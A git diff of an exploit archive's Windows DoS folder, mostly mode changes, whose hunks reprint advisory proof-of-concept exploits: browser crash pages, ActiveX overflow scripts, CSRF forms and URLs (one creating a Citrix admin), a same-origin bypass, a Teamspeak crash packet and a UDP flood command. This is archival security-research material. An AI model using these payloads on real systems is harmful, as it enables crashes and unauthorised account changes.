CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCccccabcd"> <input type="submit" value="Click here!!!!!"> </form> Juan Pablo Lopez Yacubian \ No newline at end of file diff --git a/platforms/windows/dos/3277.cpp b/platforms/windows/dos/3277.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/329.txt b/platforms/windows/dos/329.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/32939.txt b/platforms/windows/dos/32939.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33018.txt b/platforms/windows/dos/33018.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33059.smpl b/platforms/windows/dos/33059.smpl old mode 100755 new mode 100644 index 70b791535..2b9590e87 --- a/platforms/windows/dos/33059.smpl +++ b/platforms/windows/dos/33059.smpl @@ -10,4 +10,4 @@ Storm 3.09.62 is vulnerable; other versions may also be affected. Settings\Linlin\����\2.GIF" duration="0"/><item name="0001.gif" source="C:\Documents and Settings\Linlin\����\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif" -duration="0"/></playlist> \ No newline at end of file +duration="0"/></playlist> \ No newline at end of file diff --git a/platforms/windows/dos/33062.txt b/platforms/windows/dos/33062.txt old mode 100755 new mode 100644 index f807c65a3..f0e8a936e --- a/platforms/windows/dos/33062.txt +++ b/platforms/windows/dos/33062.txt @@ -7,4 +7,4 @@ Given the nature of this issue, the attacker may also be able to run arbitrary c Safari 4.0 and 4.0.1 are vulnerable; other versions may also be affected. -<html> <body> <script src="empty.js"></script> <script> try { crashSafari(); } catch(e) { setTimeout("location.reload();",42); prompt('apple culpa? comment:'); } </script> </body> </html> \ No newline at end of file +<html> <body> <script src="empty.js"></script> <script> try { crashSafari(); } catch(e) { setTimeout("location.reload();",42); prompt('apple culpa? comment:'); } </script> </body> </html> \ No newline at end of file diff --git a/platforms/windows/dos/3307.html b/platforms/windows/dos/3307.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33173.html b/platforms/windows/dos/33173.html old mode 100755 new mode 100644 index b32938c13..55eed56e2 --- a/platforms/windows/dos/33173.html +++ b/platforms/windows/dos/33173.html @@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting Versions prior to Internet Explorer 8 beta 2 are vulnerable. -<html> <head> <title>IE Crash Example</title> </head> <body> <button type="button" onclick="document.createElement('li').value = null;">null - Okay</button> <button type="button" onclick="document.createElement('li').value = 0;">0 - Okay</button> <button type="button" onclick="document.createElement('li').value = 1;">1 - Crash</button> <button type="button" onclick="document.createElement('li').value = '1';">'1' - Crash</button> <button type="button" onclick="document.createElement('li').value = true;">true - Crash</button> <button type="button" onclick="document.createElement('li').value = 'true';">'true' - Okay</button> <button type="button" onclick="document.createElement('li').value = false;">false - Okay</button> <button type="button" onclick="document.createElement('li').value = [];">[] - Okay</button> <button type="button" onclick="document.createElement('li').value = [1];">[1] - Crash</button> <button type="button" onclick="document.createElement('li').value = ['1'];">['1'] - Crash</button> <button type="button" onclick="document.createElement('li').value = ['true'];">['true'] - Okay</button> <button type="button" onclick="document.createElement('li').value = {};">{} - Okay</button> <button type="button" onclick="document.createElement('li').value = {count:1};">{count:1} - Okay</button> <button type="button" onclick="document.createElement('li').value = undefined;">undefined - Okay</button> <button type="button" onclick="document.createElement('li').value = function(){};">function(){} - Okay</button> </body> </html> \ No newline at end of file +<html> <head> <title>IE Crash Example</title> </head> <body> <button type="button" onclick="document.createElement('li').value = null;">null - Okay</button> <button type="button" onclick="document.createElement('li').value = 0;">0 - Okay</button> <button type="button" onclick="document.createElement('li').value = 1;">1 - Crash</button> <button type="button" onclick="document.createElement('li').value = '1';">'1' - Crash</button> <button type="button" onclick="document.createElement('li').value = true;">true - Crash</button> <button type="button" onclick="document.createElement('li').value = 'true';">'true' - Okay</button> <button type="button" onclick="document.createElement('li').value = false;">false - Okay</button> <button type="button" onclick="document.createElement('li').value = [];">[] - Okay</button> <button type="button" onclick="document.createElement('li').value = [1];">[1] - Crash</button> <button type="button" onclick="document.createElement('li').value = ['1'];">['1'] - Crash</button> <button type="button" onclick="document.createElement('li').value = ['true'];">['true'] - Okay</button> <button type="button" onclick="document.createElement('li').value = {};">{} - Okay</button> <button type="button" onclick="document.createElement('li').value = {count:1};">{count:1} - Okay</button> <button type="button" onclick="document.createElement('li').value = undefined;">undefined - Okay</button> <button type="button" onclick="document.createElement('li').value = function(){};">function(){} - Okay</button> </body> </html> \ No newline at end of file diff --git a/platforms/windows/dos/33174.html b/platforms/windows/dos/33174.html old mode 100755 new mode 100644 index 057442129..e733c9af5 --- a/platforms/windows/dos/33174.html +++ b/platforms/windows/dos/33174.html @@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting Versions prior to Internet Explorer 8 beta 2 are vulnerable. -<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head><title>IE crash bug</title> <script type="text/javascript"> var li = document.createElement("li"); li.setAttribute("value", "1"); // this crashes IE! li.value = "1"; // this also crashes IE! </script> </head><body> <h1>IE crash bug test</h1> </body></html> \ No newline at end of file +<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"> <head><title>IE crash bug</title> <script type="text/javascript"> var li = document.createElement("li"); li.setAttribute("value", "1"); // this crashes IE! li.value = "1"; // this also crashes IE! </script> </head><body> <h1>IE crash bug test</h1> </body></html> \ No newline at end of file diff --git a/platforms/windows/dos/33175.txt b/platforms/windows/dos/33175.txt old mode 100755 new mode 100644 index e05cb0e62..7b9ab5e2f --- a/platforms/windows/dos/33175.txt +++ b/platforms/windows/dos/33175.txt @@ -6,4 +6,4 @@ Successful exploits can allow attackers to crash the affected browser, resulting Versions prior to Internet Explorer 8 beta 2 are vulnerable. -document.createElement(&#039;li&#039;).setattribute(&#039;value&#039;, &#039;KillIE7&#039;); \ No newline at end of file +document.createElement(&#039;li&#039;).setattribute(&#039;value&#039;, &#039;KillIE7&#039;); \ No newline at end of file diff --git a/platforms/windows/dos/33185.html b/platforms/windows/dos/33185.html old mode 100755 new mode 100644 index 35ac72797..298d65f02 --- a/platforms/windows/dos/33185.html +++ b/platforms/windows/dos/33185.html @@ -4,4 +4,4 @@ The Nokia Lotus Notes Connector 'lnresobject.dll' ActiveX control is prone to a A successful attack allows a remote attacker to crash an application that is using the ActiveX control (typically Internet Explorer), denying further service to legitimate users. -<html><body> <object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object> </body></html> \ No newline at end of file +<html><body> <object classid="CLSID:{158CD9E8-E195-4E82-9A78-0CF6B86B3629}" ></object> </body></html> \ No newline at end of file diff --git a/platforms/windows/dos/33220.txt b/platforms/windows/dos/33220.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33221.html b/platforms/windows/dos/33221.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33225.html b/platforms/windows/dos/33225.html old mode 100755 new mode 100644 index b2f148623..f8e2abea9 --- a/platforms/windows/dos/33225.html +++ b/platforms/windows/dos/33225.html @@ -7,4 +7,4 @@ Successfully exploiting this issue allows remote attackers to execute arbitrary EasyMail Objects 6.0.2.0 is vulnerable; other versions may also be affected. Spam Inspector 4.0.354 is vulnerable. -<HTML> <object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object> <script language = 'vbscript'> Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") code = Scrap target.LicenseKey = code </script> <html> \ No newline at end of file +<HTML> <object classid='clsid:0CEA3FB1-7F88-4803-AA8E-AD021566955D' id='target'></object> <script language = 'vbscript'> Scrap = unescape("http://AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") code = Scrap target.LicenseKey = code </script> <html> \ No newline at end of file diff --git a/platforms/windows/dos/3331.c b/platforms/windows/dos/3331.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33350.xml b/platforms/windows/dos/33350.xml old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3341.cpp b/platforms/windows/dos/3341.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3343.cpp b/platforms/windows/dos/3343.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3347.cpp b/platforms/windows/dos/3347.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3350.html b/platforms/windows/dos/3350.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33533.html b/platforms/windows/dos/33533.html old mode 100755 new mode 100644 index 4b12e9857..22ff16e6b --- a/platforms/windows/dos/33533.html +++ b/platforms/windows/dos/33533.html @@ -7,4 +7,4 @@ An attacker can exploit this issue to execute arbitrary code in the context of t NOTE: The ActiveX control is included in AOL 9.5; other applications may also include the ActiveX control. -<package> <job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' /> <script language='vbscript'> arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") target.ViewProfile arg1 </script> </job> </package> \ No newline at end of file +<package> <job id='DoneInVBS' debug='false' error='true'> <object classid='clsid:B69003B3-C55E-4B48-836C-BC5946FC3B28' id='target' /> <script language='vbscript'> arg1=("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA") target.ViewProfile arg1 </script> </job> </package> \ No newline at end of file diff --git a/platforms/windows/dos/33587.html b/platforms/windows/dos/33587.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33608.html b/platforms/windows/dos/33608.html old mode 100755 new mode 100644 index c6d274405..67ed2ca40 --- a/platforms/windows/dos/33608.html +++ b/platforms/windows/dos/33608.html @@ -6,4 +6,4 @@ Successful exploits may allow an attacker to crash the affected browser, resulti The issue affects Safari 4.0.4; other versions may also be affected. -<body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = 'A'; for (i =0;i<150;i++) { buffer+=buffer+'A'; document.write('<html><marquee><h1>'+buffer+buffer); } } </script> \ No newline at end of file +<body onload="javascript:DoS();"></body> <script> function DoS() { var buffer = 'A'; for (i =0;i<150;i++) { buffer+=buffer+'A'; document.write('<html><marquee><h1>'+buffer+buffer); } } </script> \ No newline at end of file diff --git a/platforms/windows/dos/33707.txt b/platforms/windows/dos/33707.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33710.txt b/platforms/windows/dos/33710.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33711.txt b/platforms/windows/dos/33711.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33770.txt b/platforms/windows/dos/33770.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33819.txt b/platforms/windows/dos/33819.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33849.txt b/platforms/windows/dos/33849.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33860.html b/platforms/windows/dos/33860.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3392.html b/platforms/windows/dos/3392.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33951.txt b/platforms/windows/dos/33951.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/33977.txt b/platforms/windows/dos/33977.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3399.txt b/platforms/windows/dos/3399.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34069.html b/platforms/windows/dos/34069.html old mode 100755 new mode 100644 index 0958e553f..d28b50b7f --- a/platforms/windows/dos/34069.html +++ b/platforms/windows/dos/34069.html @@ -8,4 +8,4 @@ Successfully exploiting this issue will cause the application to stop responding Internet Explorer 6, 7, and 8 are vulnerable. -<html> <head> <title>Internet Explorer DoS Exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <body> <p style="dos:expression(alert('DoS'))">IE DoS</p> </body> </html> \ No newline at end of file +<html> <head> <title>Internet Explorer DoS Exploit (C) 2008 MustLive. http://websecurity.com.ua</title> </head> <body> <p style="dos:expression(alert('DoS'))">IE DoS</p> </body> </html> \ No newline at end of file diff --git a/platforms/windows/dos/34093.txt b/platforms/windows/dos/34093.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34129.txt b/platforms/windows/dos/34129.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34151.txt b/platforms/windows/dos/34151.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34158.txt b/platforms/windows/dos/34158.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3419.txt b/platforms/windows/dos/3419.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3421.html b/platforms/windows/dos/3421.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34227.txt b/platforms/windows/dos/34227.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34251.txt b/platforms/windows/dos/34251.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3430.html b/platforms/windows/dos/3430.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3433.html b/platforms/windows/dos/3433.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34355.txt b/platforms/windows/dos/34355.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34359.html b/platforms/windows/dos/34359.html old mode 100755 new mode 100644 index 4088e4c8e..def25c705 --- a/platforms/windows/dos/34359.html +++ b/platforms/windows/dos/34359.html @@ -16,4 +16,4 @@ Exploiting this issue may allow a remote attacker to perform certain actions in <input type="hidden" name="forwardtosearchkey" value=""> <input type="hidden" name="forwardtoisdl" value=""> <input type="hidden" name="keepcopy" value="1"> -<body onload="document.forms.xsrf.submit();"> \ No newline at end of file +<body onload="document.forms.xsrf.submit();"> \ No newline at end of file diff --git a/platforms/windows/dos/34368.c b/platforms/windows/dos/34368.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34442.html b/platforms/windows/dos/34442.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34458.html b/platforms/windows/dos/34458.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34480.py b/platforms/windows/dos/34480.py index 15fb0b06f..683aea813 100755 --- a/platforms/windows/dos/34480.py +++ b/platforms/windows/dos/34480.py @@ -24,4 +24,4 @@ try: except: print "[+]Cannot create File\n" -################PoC End################################################ \ No newline at end of file +################PoC End################################################ \ No newline at end of file diff --git a/platforms/windows/dos/345.c b/platforms/windows/dos/345.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34602.html b/platforms/windows/dos/34602.html old mode 100755 new mode 100644 index 72de56d93..b7114e704 --- a/platforms/windows/dos/34602.html +++ b/platforms/windows/dos/34602.html @@ -8,4 +8,4 @@ Successful exploits will allow attackers to bypass the same-origin policy and ob This issue affects Internet Explorer 6, 7, and 8. -<html> <head> <style> @import url("http://www.example.com/hi_heige"); </style> <script> function loaded() { alert(document.styleSheets(0).imports(0).cssText); } </script> </head> <body onload="loaded()"> </body> </html> \ No newline at end of file +<html> <head> <style> @import url("http://www.example.com/hi_heige"); </style> <script> function loaded() { alert(document.styleSheets(0).imports(0).cssText); } </script> </head> <body onload="loaded()"> </body> </html> \ No newline at end of file diff --git a/platforms/windows/dos/3464.cpp b/platforms/windows/dos/3464.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34698.txt b/platforms/windows/dos/34698.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34752.c b/platforms/windows/dos/34752.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34857.txt b/platforms/windows/dos/34857.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34889.vcf b/platforms/windows/dos/34889.vcf old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/34938.txt b/platforms/windows/dos/34938.txt old mode 100755 new mode 100644 index a9e3f6bfb..c9ab8de8b --- a/platforms/windows/dos/34938.txt +++ b/platforms/windows/dos/34938.txt @@ -11,4 +11,4 @@ Teamspeak version 2.0.32.60 is vulnerable. The following proof-of-concept packet is available: f2be000426ad7e00300000000001000a414141414141414141424141414141 4141414141414141414141414141414141414100ff99414141424242424141 -414141414141414141 \ No newline at end of file +414141414141414141 \ No newline at end of file diff --git a/platforms/windows/dos/35.c b/platforms/windows/dos/35.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35000.txt b/platforms/windows/dos/35000.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35163.c b/platforms/windows/dos/35163.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35217.txt b/platforms/windows/dos/35217.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35326.cpp b/platforms/windows/dos/35326.cpp old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35363.txt b/platforms/windows/dos/35363.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35379.go b/platforms/windows/dos/35379.go old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/354.html b/platforms/windows/dos/354.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3547.c b/platforms/windows/dos/3547.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/356.c b/platforms/windows/dos/356.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35622.txt b/platforms/windows/dos/35622.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/357.c b/platforms/windows/dos/357.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35804.txt b/platforms/windows/dos/35804.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35842.c b/platforms/windows/dos/35842.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35869.txt b/platforms/windows/dos/35869.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35873.txt b/platforms/windows/dos/35873.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35876.html b/platforms/windows/dos/35876.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/35895.txt b/platforms/windows/dos/35895.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36128.txt b/platforms/windows/dos/36128.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36152.html b/platforms/windows/dos/36152.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36211.txt b/platforms/windows/dos/36211.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36260.txt b/platforms/windows/dos/36260.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36285.c b/platforms/windows/dos/36285.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36334.txt b/platforms/windows/dos/36334.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36335.txt b/platforms/windows/dos/36335.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36336.txt b/platforms/windows/dos/36336.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36392.txt b/platforms/windows/dos/36392.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36403.html b/platforms/windows/dos/36403.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36405.txt b/platforms/windows/dos/36405.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36422.txt b/platforms/windows/dos/36422.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36427.txt b/platforms/windows/dos/36427.txt old mode 100755 new mode 100644 index 1621fe232..55c11bcf3 --- a/platforms/windows/dos/36427.txt +++ b/platforms/windows/dos/36427.txt @@ -6,4 +6,4 @@ Attackers may leverage this issue to crash the affected application, denying ser PowerDVD 11.0.0.2114 is vulnerable; other versions may also be affected. -udpsz -c "\r\n\r\n" -T SERVER 55793 -1 \ No newline at end of file +udpsz -c "\r\n\r\n" -T SERVER 55793 -1 \ No newline at end of file diff --git a/platforms/windows/dos/36433.txt b/platforms/windows/dos/36433.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36443.txt b/platforms/windows/dos/36443.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/365.html b/platforms/windows/dos/365.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36662.txt b/platforms/windows/dos/36662.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36773.c b/platforms/windows/dos/36773.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36783.txt b/platforms/windows/dos/36783.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36788.txt b/platforms/windows/dos/36788.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3684.c b/platforms/windows/dos/3684.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3690.txt b/platforms/windows/dos/3690.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/3693.txt b/platforms/windows/dos/3693.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/36969.txt b/platforms/windows/dos/36969.txt old mode 100755 new mode 100644 index aa1f112da..5247deddf --- a/platforms/windows/dos/36969.txt +++ b/platforms/windows/dos/36969.txt @@ -9,4 +9,4 @@ Citrix Licensing 11.6.1 build 10007 is vulnerable; other versions may also be af Proof-of-Concept: http://www.example.com/users?licenseTab=&selected=&userName=xsrf&firstName=xsrf&lastName=xsrf&password2=xsrf&confirm=xsrf&accountType=admin&originalAccountType=&Create=Save(Administrator CSRF) -http://www.example.com/dashboard?<something long here>=2 (pre auth DoS, crashes lmadmin.exe) \ No newline at end of file +http://www.example.com/dashboard?<something long here>=2 (pre auth DoS, crashes lmadmin.exe) \ No newline at end of file diff --git a/platforms/windows/dos/37060.html b/platforms/windows/dos/37060.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37124.txt b/platforms/windows/dos/37124.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37188.txt b/platforms/windows/dos/37188.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37239.html b/platforms/windows/dos/37239.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37287.html b/platforms/windows/dos/37287.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37346.txt b/platforms/windows/dos/37346.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37347.txt b/platforms/windows/dos/37347.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37348.txt b/platforms/windows/dos/37348.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37456.html b/platforms/windows/dos/37456.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37525.c b/platforms/windows/dos/37525.c old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37526.txt b/platforms/windows/dos/37526.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37558.txt b/platforms/windows/dos/37558.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/376.html b/platforms/windows/dos/376.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37673.html b/platforms/windows/dos/37673.html old mode 100755 new mode 100644 index e76ade42d..937bf9ba0 --- a/platforms/windows/dos/37673.html +++ b/platforms/windows/dos/37673.html @@ -6,4 +6,4 @@ An attacker may exploit this issue by enticing victims into opening a malicious The attacker can exploit this issue to cause denial-of-service conditions in Internet Explorer or other applications that use the vulnerable ActiveX control. Due to the nature of this issue, arbitrary code execution may be possible, but this has not been confirmed. -<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script> \ No newline at end of file +<html> Exploit <object classid='clsid:A4463024-2B6F-11D0-BFBC-0020F8008024' id='target' /></object> <script language='vbscript'> targetFile = "C:\WINDOWS\system32\ixsso.dll" prototype = "Property Let OnStartPage As object" memberName = "OnStartPage" progid = "Cisso.CissoQuery" argCount = 1 Set arg1=Nothing target.OnStartPage arg1 </script> \ No newline at end of file diff --git a/platforms/windows/dos/37763.txt b/platforms/windows/dos/37763.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37764.html b/platforms/windows/dos/37764.html old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37810.txt b/platforms/windows/dos/37810.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37843.txt b/platforms/windows/dos/37843.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37844.txt b/platforms/windows/dos/37844.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37845.txt b/platforms/windows/dos/37845.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37846.txt b/platforms/windows/dos/37846.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37847.txt b/platforms/windows/dos/37847.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37848.txt b/platforms/windows/dos/37848.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37849.txt b/platforms/windows/dos/37849.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37853.txt b/platforms/windows/dos/37853.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37854.txt b/platforms/windows/dos/37854.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37856.txt b/platforms/windows/dos/37856.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37857.txt b/platforms/windows/dos/37857.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37858.txt b/platforms/windows/dos/37858.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37860.txt b/platforms/windows/dos/37860.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37861.txt b/platforms/windows/dos/37861.txt old mode 100755 new mode 100644 diff --git a/platforms/windows/dos/37862.txt b/platforms/windows/dos/37862.txt old mode 100755 new mode 100644 diff 